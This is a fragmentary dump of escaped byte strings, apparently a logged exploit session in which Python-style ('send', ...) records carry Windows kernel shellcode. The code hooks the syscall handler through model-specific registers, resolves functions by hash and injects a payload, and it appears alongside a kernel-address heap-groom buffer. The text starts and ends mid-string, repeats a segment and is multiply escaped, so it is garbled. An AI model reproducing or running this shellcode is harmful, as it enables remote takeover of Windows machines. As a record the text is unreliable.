0\\\\xc2I\\\\xeb\\\\xf0\\\\x89\\\\xd0^Z\\\\xc2\\\\x08\\\\x00XZ_^PV\\\\x89\\\\xf0\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc61\\\\xc0\\\\x89\\\\xc1f\\\\x8bN\\\\x06f\\\\x8bF\\\\x14\\\\x01\\\\xc6\\\\x83\\\\xc6\\\\x18\\\\x85\\\\xc9t\\\\x1d\\\\x8b\\\\x069\\\\xf8u\\\\x07\\\\x8bF\\\\x049\\\\xd0t\\\\x06\\\\x83\\\\xc6(I\\\\xeb\\\\xe9\\\\x8bF\\\\x0c\\\\x8bN\\\\x08^\\\\x01\\\\xc6\\\\xc31\\\\xf6\\\\xc3`1\\\\xc0\\\\x83\\\\xf8\\\\x0ft\\\\x1e1\\\\xc9\\\\x8b<\\\\x86\\\\x8b\\\\x14\\\\x8e9\\\\xd7t\\\\x03Au\\\\xf3\\\\x0f\\\\xb6\\\\x94\\\\x03\\\\x87\\\\x03\\\\x00\\\\x009\\\\xd1u\\\\r@\\\\xeb\\\\xddA9\\\\xc8u\\\\x05a1\\\\xc0@\\\\xc3a1\\\\xc0\\\\xc3\\\\x00\\\\x01\\\\x02\\\\x03\\\\x04\\\\x05\\\\x06\\\\x07\\\\x08\\\\t\\\\n\\\\t\\\\t\\\\r\\\\x0e\\\\x8bL$\\\\x08`\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00]f\\\\x81\\\\xe5\\\\x00\\\\xf0\\\\x89M4\\\\xe8\\\\xd9\\\\x01\\\\x00\\\\x00\\\\xe8C\\\\x01\\\\x00\\\\x00\\\\xe8\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xe3\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bK\\\\xd8\\\\xe8\\\\x17\\\\x01\\\\x00\\\\x00<#t\\\\r<wt\\\\x1c<\\\\xc8t\"\\\\xe9\\\\xb6\\\\x00\\\\x00\\\\x00\\\\x8bM8\\\\x8bE$\\\\x89A\\\\x0e1\\\\xc0\\\\x88A\\\\x12\\\\xe9\\\\x9f\\\\x00\\\\x00\\\\x00\\\\xe8\\\\x13\\\\x01\\\\x00\\\\x00\\\\xe9\\\\xb5\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bC\\\\xe8\\\\x8b03u(\\\\x8bx\\\\x083}(\\\\x8b@\\\\x043E(;C\\\\x10\\\\x89\\\\xc3u{\\\\x8bM09\\\\xf1\\\\x8bE,t\\\\x18\\\\xe8\\\\xf2\\\\x00\\\\x00\\\\x00\\\\x8dF\\\\x04Pj\\\\x00\\\\xffU\\\\x08\\\\x85\\\\xc0tc\\\\x89E,\\\\x89u0\\\\x01\\\\xdf9\\\\xf7wS)\\\\xdf\\\\x01\\\\xc7W\\\\x89\\\\xf2\\\\x8bu<\\\\x8bv\\\\xf0\\\\x89\\\\xd9\\\\xf3\\\\xa4^\\\\x89\\\\xd9\\\\xc1\\\\xe9\\\\x02\\\\x8b](1\\\\x1e\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf9\\\\x01\\\\xd09\\\\xc6|(\\\\x8bE,`\\\\x89\\\\xe6P\\\\xff\\\\xd0\\\\x89\\\\xf4a\\\\xe8\\\\xa1\\\\x00\\\\x00\\\\x00\\\\x8bE$\\\\xd1\\\\xe81\\\\xc9\\\\x88\\\\xc1\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89E$\\\\xe8h\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00\\\\x8bM8\\\\xb4\\\\x00f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1ca\\\\xff`<\\\\x8dEH\\\\x8bM\\\\x0c\\\\x89\\\\x88G\\\\x01\\\\x00\\\\x00\\\\x89\\\\xa8>\\\\x01\\\\x00\\\\x00f\\\\xb8\\\\x10\\\\x00\\\\x8bM8f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1cah\\\\x00\\\\x00\\\\x00\\\\x00\\\\x8b@<Ph\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc31\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bE$\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89E(Y\\\\xc3`\\\\xe8\\\\x0b\\\\x00\\\\x00\\\\x00\\\\x8bE\\\\x10\\\\x8bH<\\\\x89H8a\\\\xc3`\\\\x8b],\\\\x85\\\\xdbt\\\\r1\\\\xc0\\\\x89\\\\xdf\\\\x8bM0\\\\xf3\\\\xaaS\\\\xffU\\\\x0c1\\\\xc0\\\\x89E0\\\\x89E,a\\\\xc3WRV\\\\x89\\\\xcf\\\\x8bUD\\\\x8b\\\\n\\\\xe89\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0u\\\\x0e\\\\x83\\\\xc2\\\\x08\\\\x8b\\\\n\\\\xe8+\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t!\\\\x89MDj\\\\x0cX\\\\x8dqT;\\\\x06t\\\\x07\\\\x83\\\\xc6\\\\x04;\\\\x06u\\\\r;F\\\\x04u\\\\x08\\\\x89u<1\\\\xc0@\\\\xeb\\\\x021\\\\xc0^Z_\\\\xc31\\\\xc09\\\\xc1}\\\\x01@\\\\xc3RQ1\\\\xd2f\\\\x8bQ\\\\x02\\\\x01\\\\xca;\\\\x11t\\\\x05\\\\x83\\\\xc1\\\\x04\\\\xeb\\\\xf7Z\\\\x8dA\\\\x1c\\\\x83\\\\xc0\\\\x07$\\\\xf8\\\\x89ED\\\\x8bA\\\\xf8\\\\x89E8\\\\x89\\\\xd1Z\\\\xc3SUWVATAUAVAWH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x80\\\\x00\\\\x00\\\\x00f\\\\x83\\\\xe4\\\\xf0\\\\xe8\\\\x83\\\\x03\\\\x00\\\\x00H\\\\x89E\\\\xf8H\\\\x89\\\\xc3\\\\xb9.[Q\\\\xd2\\\\xe8\\\\xee\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xd5\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc6\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8\\\\xd8\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xbf\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xf0H\\\\x89\\\\xc7\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe8\\\\xbe\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xa5\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xe8L\\\\x8dM\\\\xd0M1\\\\xc0L\\\\x89\\\\xc1D\\\\x89E\\\\xd0L\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6D\\\\x8bE\\\\xd0E\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0H1\\\\xc9\\\\xff\\\\xd7H\\\\x85\\\\xc0\\\\x0f\\\\x84n\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc3H1\\\\xc9I\\\\x89\\\\xc9D\\\\x8bE\\\\xd0H\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6H\\\\x85\\\\xc0\\\\x0f\\\\x85Q\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xd8H-\\\\xf8\\\\x00\\\\x00\\\\x00H\\\\x05(\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0\\\\x81\\\\xea(\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c3\\\\x01\\\\x00\\\\x00\\\\x89U\\\\xd0P\\\\xe8?\\\\x02\\\\x00\\\\x00H\\\\x89\\\\xc2X\\\\xb9\\\\xfa<\\\\xad\\\\xc2H9\\\\xcat\\\\n\\\\xb9\\\\x1a\\\\xbdK+H9\\\\xcau\\\\xcaH\\\\x8bp\\\\xe8H\\\\x89\\\\xd9\\\\xffU\\\\xe8H\\\\x89\\\\xf0H1\\\\xd2H\\\\x89\\\\xc3\\\\x8bP<H\\\\x01\\\\xd0H\\\\x89\\\\xc6H1\\\\xc9H\\\\x89\\\\xcaf\\\\x8bH\\\\x06f\\\\x8bP\\\\x14H\\\\x01\\\\xd6H\\\\x83\\\\xc6\\\\x18H\\\\xbf.data\\\\x00\\\\x00\\\\x00H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x84\\\\xcd\\\\x00\\\\x00\\\\x00H\\\\x8b\\\\x06H9\\\\xf8t\\\\tH\\\\x83\\\\xc6(H\\\\xff\\\\xc9\\\\xeb\\\\xe5\\\\x8bF\\\\x0c\\\\x8bN\\\\x08H\\\\x01\\\\xc6H\\\\xbb\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfeH\\\\x83\\\\xe9\\\\x08H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x8c\\\\x9b\\\\x00\\\\x00\\\\x00H\\\\x8b>H9\\\\xdfu\\\\x0cL\\\\x8b\\\\x86\\\\x98\\\\x00\\\\x00\\\\x00M\\\\x85\\\\xc0t\\\\x06H\\\\x83\\\\xc6\\\\x08\\\\xeb\\\\xd8H\\\\x83\\\\xc6\\\\x08H\\\\x89u\\\\xe0H1\\\\xc9\\\\xba\\\\xf0\\\\x0f\\\\x00\\\\x00\\\\xffU\\\\xf0H\\\\x85\\\\xc0tiI\\\\x89\\\\xc1H1\\\\xc0\\\\xb9\\\\x00\\\\x04\\\\x00\\\\x00L\\\\x89\\\\xcf\\\\xf3\\\\xabL\\\\x89\\\\xcfH\\\\x83\\\\xc7`H\\\\x8d5\\\\x91\\\\x02\\\\x00\\\\x00H1\\\\xc9f\\\\xb96\\\\x02\\\\xf3\\\\xa4M\\\\x89\\\\tH\\\\x8b]\\\\xf8I\\\\x89Y\\\\x08H1\\\\xdfH\\\\x8b]\\\\xf0I\\\\x89Y\\\\x10H1\\\\xdfH\\\\x8b]\\\\xe8I\\\\x89Y\\\\x18H1\\\\xdfH\\\\x8b]\\\\xe0I\\\\x89Y H1\\\\xdfA\\\\x89yDH\\\\x8bE\\\\xe0H\\\\x83\\\\xc0pI\\\\x83\\\\xc1`L\\\\x89\\\\x08H\\', 0.0)', '(\\'send\\', 12, b\\'\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x90\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\x01\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x02\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x001\\\\xc0@\\\\x90t\\\\x08\\\\xe8\\\\t\\\\x00\\\\x00\\\\x00\\\\xc2$\\\\x00\\\\xe8\\\\xa7\\\\x00\\\\x00\\\\x00\\\\xc3\\\\xe8\\\\x01\\\\x00\\\\x00\\\\x00\\\\xeb\\\\x90[\\\\xb9v\\\\x01\\\\x00\\\\x00\\\\x0f2\\\\xa3\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\x8dC\\\\x171\\\\xd2\\\\x0f0\\\\xc3\\\\xb9#\\\\x00\\\\x00\\\\x00j0\\\\x0f\\\\xa1\\\\x8e\\\\xd9\\\\x8e\\\\xc1d\\\\x8b\\\\r@\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\xff5\\\\xfc\\\\xff\\\\xdf\\\\xff`\\\\x9cj#R\\\\x9cj\\\\x02\\\\x83\\\\xc2\\\\x08\\\\x9d\\\\x80L$\\\\x01\\\\x02j\\\\x1b\\\\xff5\\\\x04\\\\x03\\\\xdf\\\\xffj\\\\x00USVWd\\\\x8b\\\\x1d\\\\x1c\\\\x00\\\\x00\\\\x00j;\\\\x8b\\\\xb3$\\\\x01\\\\x00\\\\x00\\\\xff31\\\\xc0H\\\\x89\\\\x03\\\\x8bn(j\\\\x01\\\\x83\\\\xecH\\\\x81\\\\xed\\\\x9c\\\\x02\\\\x00\\\\x00\\\\xa1\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\xb9v\\\\x01\\\\x00\\\\x001\\\\xd2\\\\x0f0\\\\xfb\\\\xe8\\\\x11\\\\x00\\\\x00\\\\x00\\\\xfad\\\\x8b\\\\r@\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\x83\\\\xec(\\\\x9da\\\\xc3\\\\xe9\\\\xef\\\\x00\\\\x00\\\\x00\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f2H\\\\xbb\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x89S\\\\x04\\\\x89\\\\x03H\\\\x8d\\\\x05\\\\n\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xc2H\\\\xc1\\\\xea \\\\x0f0\\\\xc3\\\\x0f\\\\x01\\\\xf8eH\\\\x89$%\\\\x10\\\\x00\\\\x00\\\\x00eH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00PSQRVWUAPAQARASATAUAVAWj+e\\\\xff4%\\\\x10\\\\x00\\\\x00\\\\x00ASj3QL\\\\x89\\\\xd1H\\\\x83\\\\xec\\\\x08UH\\\\x81\\\\xecX\\\\x01\\\\x00\\\\x00H\\\\x8d\\\\xac$\\\\x80\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x9d\\\\xc0\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xbd\\\\xc8\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xb5\\\\xd0\\\\x00\\\\x00\\\\x00H\\\\xa1\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xc2H\\\\xc1\\\\xea H1\\\\xdb\\\\xff\\\\xcbH!\\\\xd8H1\\\\xc9\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f0\\\\xfb\\\\xe88\\\\x00\\\\x00\\\\x00\\\\xfaeH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00H\\\\x83\\\\xecxA_A^A]A\\\\\\\\A[AZAYAX]_^ZY[XeH\\\\x8b$%\\\\x10\\\\x00\\\\x00\\\\x00\\\\x0f\\\\x01\\\\xf8\\\\xff$%\\\\xf8\\\\x0f\\\\xd0\\\\xff1\\\\xc0@\\\\x90\\\\x0f\\\\x84\\\\xb5\\\\x05\\\\x00\\\\x00\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00X`\\\\x89\\\\xc3\\\\x89\\\\xe5\\\\x83\\\\xecHd\\\\x8b\\\\r8\\\\x00\\\\x00\\\\x00f\\\\x8bA\\\\x06\\\\xc1\\\\xe0\\\\x10f\\\\x8b\\\\x01f%\\\\x00\\\\xf0\\\\x8b\\\\x08f\\\\x81\\\\xf9MZt\\\\x07-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xf0\\\\x89E\\\\xfcS\\\\x89\\\\xc3\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8>\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf8\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe81\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\xb9.[Q\\\\xd2\\\\xe8$\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xec[\\\\x8dU\\\\xe81\\\\xc9\\\\x89\\\\nRj\\\\x00Rj\\\\x0b\\\\xff\\\\xd0\\\\x8bU\\\\xe8\\\\x85\\\\xd2\\\\x0f\\\\x84\\\\x02\\\\x01\\\\x00\\\\x00Rj\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xf4\\\\x00\\\\x00\\\\x00Pj\\\\x00\\\\xffu\\\\xe8Pj\\\\x0b\\\\xffU\\\\xec\\\\x85\\\\xc0\\\\x0f\\\\x85\\\\xe0\\\\x00\\\\x00\\\\x00XP-\\\\xfc\\\\x00\\\\x00\\\\x00\\\\x05\\\\x1c\\\\x01\\\\x00\\\\x00P\\\\xe8\\\\x80\\\\x01\\\\x00\\\\x00\\\\xb9\\\\xfa<\\\\xad\\\\xc29\\\\xc8t\\\\x1e\\\\xb9\\\\x1a\\\\xbdK+9\\\\xc8t\\\\x15X\\\\x8bU\\\\xe8\\\\x81\\\\xea\\\\x1c\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c\\\\xac\\\\x00\\\\x00\\\\x00\\\\x89U\\\\xe8\\\\xeb\\\\xceX\\\\x8bp\\\\xec\\\\xffU\\\\xf4\\\\x89\\\\xf0PPh.datja\\\\xe8\\\\\\'\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x88\\\\x00\\\\x00\\\\x00X\\\\x83\\\\xe9@\\\\xe8Z\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x15\\\\x8b\\\\x16\\\\xc1\\\\xea\\\\x18\\\\x89\\\\xf0\\\\xc1\\\\xe8\\\\x189\\\\xd0u\\\\x07\\\\x8bFH\\\\x85\\\\xc0t\\\\n\\\\x83\\\\xc6\\\\x04\\\\x83\\\\xe9\\\\x04\\\\xe3^\\\\xeb\\\\xd8\\\\x89u\\\\xf0Vh\\\\xf8\\\\x0f\\\\x00\\\\x00j\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0tJP\\\\x89\\\\xc71\\\\xc0\\\\x89\\\\xc1f\\\\x81\\\\xc1\\\\x00\\\\x04\\\\xf3\\\\xabX\\\\x89\\\\x00\\\\x8bU\\\\x04\\\\x89P\\\\x041\\\\xd7\\\\x8bU\\\\xf8\\\\x89P\\\\x081\\\\xd7\\\\x8bU\\\\xf4\\\\x89P\\\\x0c1\\\\xd7\\\\x8bU\\\\xf0\\\\x89P\\\\x101\\\\xd7\\\\x89x$\\\\x83\\\\xc0H\\\\x89\\\\xc7\\\\x8d\\\\xb3\\\\x96\\\\x03\\\\x00\\\\x00\\\\xb9\\\\x1a\\\\x02\\\\x00\\\\x00\\\\xf3\\\\xa4[\\\\x89C8\\\\x89\\\\xeca\\\\xc3SRQWU\\\\x89\\\\xe5\\\\x83\\\\xec\\\\x18\\\\x89\\\\xcf\\\\x89\\\\xd8\\\\x89E\\\\xfc\\\\xe8z\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0tm\\\\x89E\\\\xf8\\\\xe8\\\\xee\\\\x00\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x0e\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tS\\\\x89E\\\\xf0\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x04\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tA\\\\x89E\\\\xec\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\xfa\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t/\\\\x89E\\\\xe8\\\\x8bE\\\\xfc\\\\x89\\\\xf9\\\\x8bU\\\\xec\\\\x8b]\\\\xf4\\\\xe8\\\\xab\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x18\\\\x89\\\\xc1\\\\x8bE\\\\xe8\\\\xe8\\\\xdd\\\\x00\\\\x00\\\\x00f\\\\x89\\\\xc2\\\\x8bE\\\\xfc\\\\x8bM\\\\xf0\\\\xe8\\\\xd7\\\\x00\\\\x00\\\\x00\\\\x83\\\\xc4\\\\x18]_YZ[\\\\xc3V\\\\x89\\\\xc6\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc6f\\\\x81>PEu\\\\t\\\\x83\\\\xc6x\\\\x8b6\\\\x01\\\\xf0^\\\\xc31\\\\xc0\\\\xeb\\\\xfaVQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x05\\\\x01\\\\xc8F\\\\xeb\\\\xe9_Y^\\\\xc3VWR\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0F\\\\xe2\\\\xeeZ_^\\\\xc3VQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\xc6\\\\x01\\\\xc8FF\\\\xeb\\\\xe8_Y^\\\\xc3\\\\x83\\\\xc0\\\\x18\\\\x8b\\\\x00\\\\xc3WVQ1\\\\xff\\\\x89\\\\xc69\\\\xdft\\\\x19\\\\x8b\\\\x04\\\\xba\\\\x01\\\\xf0\\\\xe8\\\\x83\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x07G\\\\xeb\\\\xebY^_\\\\xc3\\\\x89\\\\xf8\\\\xeb\\\\xf81\\\\xc0\\\\xeb\\\\xf4\\\\x83\\\\xc1\\\\x1c\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1 \\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1$\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\xd1\\\\xe1\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3\\\\x81\\\\xe2\\\\xff\\\\xff\\\\x00\\\\x00\\\\xc1\\\\xe2\\\\x02\\\\x01\\\\xd1\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3RV\\\\x8bt$\\\\x0c\\\\x8bL$\\\\x101\\\\xd2\\\\xd1\\\\xe9\\\\x85\\\\xc9t\\\\x0c\\\\xc1\\\\xc2\\\\x05\\\\xacF\\\\x0c 0\\\\xc2I\\\\xeb\\\\xf0\\\\x89\\\\xd0^Z\\\\xc2\\\\x08\\\\x00XZ_^PV\\\\x89\\\\xf0\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc61\\\\xc0\\\\x89\\\\xc1f\\\\x8bN\\\\x06f\\\\x8bF\\\\x14\\\\x01\\\\xc6\\\\x83\\\\xc6\\\\x18\\\\x85\\\\xc9t\\\\x1d\\\\x8b\\\\x069\\\\xf8u\\\\x07\\\\x8bF\\\\x049\\\\xd0t\\\\x06\\\\x83\\\\xc6(I\\\\xeb\\\\xe9\\\\x8bF\\\\x0c\\\\x8bN\\\\x08^\\\\x01\\\\xc6\\\\xc31\\\\xf6\\\\xc3`1\\\\xc0\\\\x83\\\\xf8\\\\x0ft\\\\x1e1\\\\xc9\\\\x8b<\\\\x86\\\\x8b\\\\x14\\\\x8e9\\\\xd7t\\\\x03Au\\\\xf3\\\\x0f\\\\xb6\\\\x94\\\\x03\\\\x87\\\\x03\\\\x00\\\\x009\\\\xd1u\\\\r@\\\\xeb\\\\xddA9\\\\xc8u\\\\x05a1\\\\xc0@\\\\xc3a1\\\\xc0\\\\xc3\\\\x00\\\\x01\\\\x02\\\\x03\\\\x04\\\\x05\\\\x06\\\\x07\\\\x08\\\\t\\\\n\\\\t\\\\t\\\\r\\\\x0e\\\\x8bL$\\\\x08`\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00]f\\\\x81\\\\xe5\\\\x00\\\\xf0\\\\x89M4\\\\xe8\\\\xd9\\\\x01\\\\x00\\\\x00\\\\xe8C\\